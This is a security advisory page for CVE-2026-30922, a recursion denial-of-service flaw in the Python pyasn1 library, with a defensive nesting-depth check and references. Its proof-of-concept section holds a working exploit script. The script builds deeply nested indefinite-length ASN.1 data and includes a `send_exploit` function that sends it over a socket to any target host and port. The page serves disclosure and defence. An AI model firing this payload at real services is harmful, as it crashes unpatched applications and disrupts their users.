Security Vulnerability Report
CVE-2026-30922 CVSS 7.5 HIGH

Published: 2026-03-18 04:17:18
Last Modified: 2026-05-01 17:16:22

Description

pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with "Indefinite Length" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.
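The nesting the description relies on can be measured, and bounded, before any recursive decoder sees the data. Added example, not code from the advisory or from the pyasn1 project: an iterative walk over BER tag/length headers that returns the maximum constructed-nesting depth (definite and indefinite lengths both handled) and rejects input past a limit; the default limit of 64 and the names `ber_max_depth` and `is_safe_to_decode` are this example's own assumptions.

```python
# Added example (not advisory or pyasn1 code): iterative BER nesting-depth
# pre-check; the default limit of 64 and the function names are assumptions.
def ber_max_depth(data: bytes, limit: int = 64) -> int:
    """Deepest constructed nesting in `data`; ValueError once `limit` is passed."""
    ends = []  # one entry per open container: end offset, or None if indefinite
    pos, max_depth, n = 0, 0, len(data)
    while pos < n:
        while ends and ends[-1] is not None and pos >= ends[-1]:
            ends.pop()  # definite-length container fully consumed
        tag, pos = data[pos], pos + 1
        if tag & 0x1F == 0x1F:  # high-tag-number form: skip continuation octets
            while pos < n and data[pos] & 0x80:
                pos += 1
            pos += 1
        if pos >= n:
            raise ValueError("truncated tag/length header")
        if tag == 0x00:  # end-of-contents (00 00) closes an indefinite container
            if data[pos] != 0x00 or not ends or ends[-1] is not None:
                raise ValueError("unexpected end-of-contents octets")
            pos += 1
            ends.pop()
            continue
        first, pos = data[pos], pos + 1
        if first == 0x80:
            length = None  # indefinite: terminated later by 00 00
        elif first & 0x80:  # long form: low 7 bits give the number of length octets
            count = first & 0x7F
            length = int.from_bytes(data[pos:pos + count], "big")
            pos += count
        else:
            length = first  # short form
        if tag & 0x20:  # constructed (SEQUENCE, SET, ...): descend one level
            if len(ends) >= limit:
                raise ValueError(f"nesting depth {len(ends) + 1} exceeds limit {limit}")
            ends.append(None if length is None else pos + length)
            max_depth = max(max_depth, len(ends))
        elif length is None:
            raise ValueError("primitive value with indefinite length")
        else:
            pos += length  # skip primitive contents without recursing
    return max_depth

def is_safe_to_decode(data: bytes, limit: int = 64) -> bool:
    """True when `data` can go to a recursive BER decoder within `limit`."""
    try:
        ber_max_depth(data, limit)
    except ValueError:
        return False
    return True
```

Because the walk keeps its own stack instead of recursing, it stays flat in Python stack usage no matter how deep the input nests, and it stops at the limit rather than scanning the whole payload.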

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:pyasn1:pyasn1:*:*:*:*:*:python:*:* - VULNERABLE
pyasn1 < 0.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket


def create_nested_asn1_payload(depth=5000):
    """
    Generate a malicious ASN.1 payload with deeply nested SEQUENCE tags
    using indefinite length encoding to trigger recursion overflow.
    CVE-2026-30922 PoC
    """
    # Start with SEQUENCE tag (0x30) with indefinite length (0x80)
    payload = b'\x30\x80'
    # Add deeply nested SEQUENCE tags
    for _ in range(depth):
        payload += b'\x30\x80'
    # Close all nested tags with BER end-of-contents markers (0x00 0x00)
    for _ in range(depth + 1):
        payload += b'\x00\x00'
    return payload


def send_exploit(target_host, target_port, depth=5000):
    """
    Send the malicious payload to target service.
    """
    payload = create_nested_asn1_payload(depth)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    try:
        sock.connect((target_host, target_port))
        sock.sendall(payload)
        print(f'[+] Malicious payload sent ({len(payload)} bytes, depth={depth})')
    except Exception as e:
        print(f'[-] Error: {e}')
    finally:
        sock.close()


def test_locally():
    """
    Test the vulnerability locally using pyasn1 decoder.
    """
    try:
        # Use the BER decoder: pyasn1's DER decoder rejects indefinite-length
        # encoding up front and never reaches the recursive path
        from pyasn1.codec.ber import decoder
        payload = create_nested_asn1_payload(2000)
        print('[+] Testing payload with pyasn1 decoder...')
        # This should trigger RecursionError
        result = decoder.decode(payload)
        print('[-] No error occurred (unexpected)')
    except RecursionError:
        print('[+] RecursionError triggered - vulnerability confirmed!')
    except Exception as e:
        print(f'[-] Other error: {type(e).__name__}: {e}')


if __name__ == '__main__':
    test_locally()
```

Weakness

CWE-674 (Uncontrolled Recursion)
Record Status: Modified

References

https://github.com/pyasn1/pyasn1/commit/25ad481c19fdb006e20485ef3fc2e5b3eff30ef0 - Patch
https://github.com/pyasn1/pyasn1/security/advisories/GHSA-jr27-m4p2-rc6r - Exploit, Vendor Advisory
http://www.openwall.com/lists/oss-security/2026/03/20/4
https://lists.debian.org/debian-lts-announce/2026/05/msg00001.html